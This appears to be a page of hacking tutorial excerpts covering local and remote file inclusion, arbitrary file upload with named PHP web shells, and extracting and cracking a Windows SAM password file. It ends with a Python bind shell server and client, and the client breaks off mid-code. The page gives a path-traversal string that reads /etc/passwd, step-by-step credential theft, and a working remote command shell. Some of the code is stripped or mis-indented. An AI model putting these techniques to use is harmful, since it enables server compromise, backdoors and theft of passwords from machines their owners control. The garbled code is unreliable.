Understanding LFI and RFI Attacks

Local File Inclusion ( LFI ) is a method of including files on a server through a Modified Special HTTP request. This vulnerability can be exploited using a Web Browser and thus can be very easy to exploit. The vulnerability occurs when a user supplied data without sanitizing is provided to an ‘inclusion type’ (like , include() , require() etc.) . Mostly these attacks are accompanied by Directory Transversal attacks which can reveal some sensitive data leading to further attacks.

Now that’s quite a bit of theory there let’s have a look on a sample vulnerable application.

Demonstration [Proof of Concept]

I have created a pair of files named index.html and lfi.php
lfi.php

Code:

  
   
   
     
  
   
   

Welcome to this Website

   
   You are currently at $page";?>


   
   
   
  

As you see the above code has a include(USER_INPUT) So basically we can input any filename and it will simply print out the contents on the screen. This is the most popular form in which these bugs occur.
index.html

Code:

  Hello I am a sample page my name is index.html

Providing normal Input:-
First let’s try and give this app a normal input which it would be expecting.

Input: index.html
Output:-

Code:

  Welcome to this Website

  You are currently at index.html
  Hello I am a sample page my name is index.html

It works fine! Now let’s construct the attack string and see what happens!


Constructing the attack string

As I am working on UNIX we’ll print out the contents of /etc/passwd file , The file /etc/passwd is a local source of information about users' accounts.

My present working directory is /var/www/ , So what I have to do is :-

1. Go back 2 directories and
2. Then go to /etc/passwd

We can go back 2 directories using ‘../../’

Attack string :-

Code:

  ../../etc/passwd

Now lets feed this as an input and see what happens.

Input: “ ../../etc/passwd”

Code:

  Welcome to this Website

  You are currently at ../../etc/passwd 
  root:x:0:1:Super-User:/root:/sbin/sh 
daemon:x:1:1::/: 
bin:x:2:2::/usr/bin: 
sys:x:3:3::/: 
adm:x:4:4:Admin:/var/adm: 
lp:x:71:8:Line Printer Admin:/usr/spool/lp: 
uucp:x:5:5:uucp Admin:/usr/lib/uucp: 
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/

And voila! We just printed the /etc/passwd file.

Remote File Inclusion

RFI is an abbreviation for Remove File Inclusion and is quite similar to LFI, Remote File Inclusion ( RFI ) is a method of including Remote files(present on another server) on a server through a Modified Special HTTP request. This vulnerability can be exploited using a Web Browser and thus can be very easy to exploit. The vulnerability occurs when a user supplied data without sanitizing is provided to an ‘inclusion type’ (like, include (), require () etc.)

Demonstration [Proof of Concept]

We’ll be using the same sample web-app we used to Demonstrate LFI

Constructing the attack string:-

In our case we want to include go4expert’s index file in our local file.

So what we have to do is, simply provide the URI as an input and see what happens

Input : http://go4expert.com

Output (page source):-

Code:

  

                       
 

 

 

Welcome to this Website
You are currently at http://go4expert.com



                  
          
 





 

 --------Sniped-----------

Read More

Understanding Arbitrary File Upload Vulnerablilities

As the name suggests Arbitrary File Upload Vulnerabilities is a type of vulnerability which occurs in web applications if the file type uploaded is not checked, filtered or sanitized.

The main danger of these kind of vulnerabilities is that the attacker can upload a malicious PHP , ASP etc. script and execute it. The main idea is to get the access to the server and execute desired code. for example an Attacker who have gained access to such kind of vulnerability can upload a malicious shell script and further can control the machine to execute desired commands, which would lead to a full compromise of the server and the victim’s server gets owned.

In this tutorial we’ll be looking at a a basic example of a Vulnerable Script and How to exploit it. So let’s get started.

Proof of Concept

For the demonstration of a realistic scenario, I have created a basic vulnerable PHP script.

Upload.php

Code:

  HERE";
        }
  }
   
  ?>
   
  
   
  
   
      
   
  
   
  
   
  

Arbitary file upload ( POC )


   
  Hey all this is a sample php script to upload image files , This script doesn't contains file type checking code which makes it prone to Arbitary file upload vulnerbility. 


   
  


  

Upload


   
  

  




      
          
Upload File 
          

          

      
      


   
  
   
  

In the above script we simply ask the user to input the file to be uploaded and without even checking what the file-type is or its extension we upload it.

This is a basic example of how these bugs occur.

How to exploit it

Now to exploit this common bug is yet simpler, the hacker can simply download any Web Shell-Scripts , Written in PHP , ASP etc.

Some PHP Shells :-

Ani-Shell
[ R57 Shell
C99 Shell

Note: These shells are not intended to be used as this way, author is not responsible for the way in which the user uses it.

Now to exploit this vulnerability the hacker have to carry out some steps :-

Upload the Shell



Go to the link



Gain Access

Read More

All about SAM

Section 1 : General Information
As you may or may not know, all of the passwords on a Windows XP computer are stored in a SAM File. This file is located on your computer’s hard drive in the directory “C:WINDOWSSystem32Config” The file’s name is SAM, obviously. Now, you may be thinking, “Wow, this was incredibly easy, I just right click the file, and click send to a floppy or where ever. Well, unfortunately, it isn’t that simple. I will detail the various methods of getting the SAM file in the next section.

Section 2 : Obtaining the SAM file
In the previous section, I discussed where the SAM file was found. As you may have found out, when you attempt to copy this file, you get a nasty error saying something along the lines of “Access is denied. File is in use.” The SAM file is in use by the system, so you cannot just go to task manager, and end the process. You need to find alternate methods of starting up the computer without using the SAM file. As far as I know, this can be done several ways.

Booting the computer up into Linux using a boot CD or floppy is one method. To use this method, you will need a Linux Boot CD, and access to BIOS. If you don’t have access to BIOS then consult one of the many tutorials on the web on how to crack the BIOS password.

To make a bootable Linux CD, you have to find a version of Linux, which can be burned and run off a CD (To find these, consult my links, or search google). This should be relatively easy to find. Next you need some kind of burning software, which allows you to burn an image onto a CD (Consult Links, or search google). This a bit harder to find for free, but a demo works just fine. After you have these, burn the image to the CD. You now have a Linux Boot CD.

Now to alter the BIOS settings, so that you can boot into Linux from the CD. Shut down your computer, and during the start up screen, you should see a notice to press F1 or F8 (Maybe a different key) to enter Boot setup. Press it. This will take you into the BIOS, however, if there is a password on the BIOS, then you have to consult an article about cracking BIOS passwords. Next go to Boot Order and change the CD drive to first. Save your changes, insert your Linux CD and exit. Let the system boot up. It should boot into Linux if you did everything correctly. Now all you have to do is insert a blank floppy, and copy the SAM file to it, since it is not in use anymore because Windows is not running. Congratulations, you now have the SAM file. Be sure to get the SYSTEM file in the same directory as well, as some passwords are encrypted with keys from within that file.

Another, somewhat easier way of obtaining the files is using a MSDOS boot disk. This method doesn’t require you to go looking for some software, or using special burning software. Just insert a floppy, right click on it in My Computer, and click on format floppy. When the menu appears, mark the box for “Create a MS-DOS startup boot disk”, and then click the start button. After you have made your disk, restart your computer with the disk still in the drive. Make sure you BIOS settings boot from the floppy drive before the hard-drive. When the computer boots, you should se a screen similar to that I command prompt. “A:>” is most likely the prompt you will see. First you need to change drives to the c drive. This is done various ways on different computers. “cd C:” or “C:” usually work. Next you will need to use the copy command to copy the SAM and SYSTEM files to other areas of the hard drive. The syntax for the copy command is as follows without the quotes : “C:Copy (file to be copied) (destination)” so the correct command which will get the file for you is “C:Copy C:WINDOWSSystem32ConfigSAM C:” This will copy the SAM file to the C drive. Replace “SAM” with “SYSTEM” to get the system file. Next you might want to rename these files. This is the syntax for the Rename command : “C:ren (file to be renamed) (new file name)”. The command, which will rename your files for you, will be “C:ren C:SAM Whatever” if you saved it to the C drive. This will rename you SAM file to Whatever. Now restart your computer without the boot disk in and start up windows. Copy the files onto a floppy. Note : you may have to zip it as the SYSTEM file is pretty big. The reason these methods work, are because the SAM file is not in use when you aren’t running Windows, and when u copied and renamed the file, it did not get used by windows when you logged on. Now on to the easy part, cracking the SAM file.

Section 3 : Cracking the SAM file
There is a wealth of programs available that will crack the SAM file for you. You can also attempt to crack it by hand. I having neither the time nor the skill required to do this, used a program. Some programs I recommend are SAMinside, which unfortunately costs money, Proactive Windows Security Explorer, which actually can import the SAM file from memory, so you will not need to obtain it by yourself if you are doing this on your home computer, and of course CAIN and ABEL will do the trick as well. Most of these programs test about 4 to 5 million passwords per second, at least on my machine, so if the password if below 7 characters, it should be able to crack it in one day. However, if the password is 7 or more characters in length, then it will take a substantial amount of time. When I did this, my password was 7 characters in length and it took my computer just over 3 days to crack it.  

Read More

Bind Shell and Client in Python

“Bind Shell” is often used to describe a piece of program or Shell Code which bind's to a specific port on the machine and provides access to other machines (i.e attacker) to connect and execute shell commands on the victim machine.

In this article we'll be looking at a basic implementation of Bind Shell and Client coded in python.

The Code

The Code structure is distributed to a set of files , server.py and client.py .

Server

The server.py program simply listens on the specified port (default : 31337) , and Provides “Shell” access to the connected machines.

Code:

 #!/usr/bin/env python  
 # Server  
 
 import sys  
 import socket  
 import os  

 host = '';  
 SIZE = 512;  

 try :  
     port = sys.argv[1];  

 except :  
     port = 31337;  
 
 try :  
     sockfd = socket.socket(socket.AF_INET , socket.SOCK_STREAM);  

 except socket.error , e :  

     print "Error in creating socket : ",e ;  
     sys.exit(1);   

 sockfd.setsockopt(socket.SOL_SOCKET , socket.SO_REUSEADDR , 1);  

 try :  
     sockfd.bind((host,port));  

 except socket.error , e :        
     print "Error in Binding : ",e; 
     sys.exit(1);  
 
 print("\n\n======================================================"); 
 print("-------- Server Listening on Port %d --------------" % port);  
 print("======================================================\n\n"); 
 
 try :  
     while 1 : # listen for connections  
         sockfd.listen(1);  
             clientsock , clientaddr = sockfd.accept();  
         print("\n\nGot Connection from " + str(clientaddr));  
         while 1 :  
             try :  
                 cmd = clientsock.recv(SIZE);  
             except :  
                 break;  
             pipe = os.popen(cmd);  
             rawOutput = pipe.readlines();  
 
             print(cmd);  
           
             if cmd == 'g2g': # close the connection and move on for others  
                 print("\n-----------Connection Closed----------------");  
                 clientsock.shutdown();  
                 break;  
                        try :  
                 output = "";  
                 # Parse the output from list to string  
                 for data in rawOutput :  
                      output = output+data;  
                   
                 clientsock.send("Command Output :- \n"+output+"\r\n");  
               
             except socket.error , e :  
                   
                 print("\n-----------Connection Closed--------");  
                 clientsock.close();  
                 break;  
  except  KeyboardInterrupt :  
 

     print("\n\n>>>> Server Terminated <<<<<\n");  
     print("==========================================================="); 
     print("\tThanks for using Simple-CMD");  
     print("\tEmail : lionaneesh@gmail.com");  
     print("============================================================");

Client

The client.py program connects to the server and sends the commands to be executed.

Code:

 #!/usr/bin/env python  
 # Simple network client  

 import socket;  
 import sys;  
 
 port = 31337;    # The port to listen on is hardcoded , if you bare changing this change the same of the server  
 SIZE = 1000;  
 
 try :  
     host = sys.argv[1];  
 except :     # Add localhost as the server if no host provided  
     host = "127.0.0.1";  
 
 try :  
     sockfd = socket.socket(socket.AF_INET , socket.SOCK_STREAM);  
 
 except socket.error , e :  
       
     print "Error while Creating socket : ",e ;      
     sys.exit(1);  
 
 try :  
     sockfd.connect((host,port));  
 
 except socket.gaierror , e :  

Read More